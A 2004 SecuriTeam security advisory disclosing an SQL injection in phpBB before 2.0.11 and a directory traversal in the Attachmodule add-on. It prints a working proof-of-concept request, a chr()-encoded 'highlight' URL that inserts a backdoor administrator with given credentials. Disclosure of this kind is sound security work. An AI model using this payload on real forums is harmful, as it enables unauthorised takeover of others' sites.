Date: 29 Nov 2004 10:54:57 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
phpBB SQL Injection and Attachmodule Add-On Directory Traversal
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/>; phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."
An SQL injection vulnerability and a directory traversal vulnerabilities
exist within phpBB and Attach module's code.
DETAILS
Vulnerable Systems:
* phpBB versions prior to 2.0.11
* Attachmodule, all versions
Immune Systems:
* phpBB version 2.0.11
Due to decoding mishandling of the input request a malicious attacker is
able to inject any type of SQL query to the back-end database server. Upon
close inspection of the code is became evident that using multiple char()
functions will fool phpBB and allow insertion of an SQL query.
The following SQL statement will add a user with administrative rights on
the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password,
user_level) VALUES ('99999', '1', 'ze3lock',
'ba3c83348bddf7b368b478ac06d3340e', '1')
And the following login credentials:
username: ze3lock
pass: thepass
Note: This query is assuming that the phpBB user table is called
'phpbb_users', which comprise most of the sites using phpBB. However,
sites in which the table's name was changed will not be affected and the
correct name of the table will have to be discovered before exploitation
can take place.
The exploit can be run on any site using phpBB without the need to be
registered. This makes it a prime target for automated scripts that insert
backdoors in many sites around the web. A proof of concept HTTP query is
provided below. In order to make it work, an active thread number from the
forums must be substituted in, but this is relatively trivial to find.
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
In addition, a directory traversal bug in the Attachmodule allows the user
to read any file located on the local filesystem of the server running
phpBB. The main culprit is the 'UPLOAD_DIR' argument which is not properly
sanitized. This directory represents the directory in which all files
should be uploaded to and the system accepts any type of character as
input. An attacker is thus able to overwrite files on the local filesystem
of the server.
Vendor Status:
Users of this system are highly encouraged to upgade to version 2.0.11 and
add input validation to the 'UPLOAD_DIR' argument of Attachmodule.
ADDITIONAL INFORMATION
The information has been provided by <mailto:zee@psybnc.it.> Zeelock.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
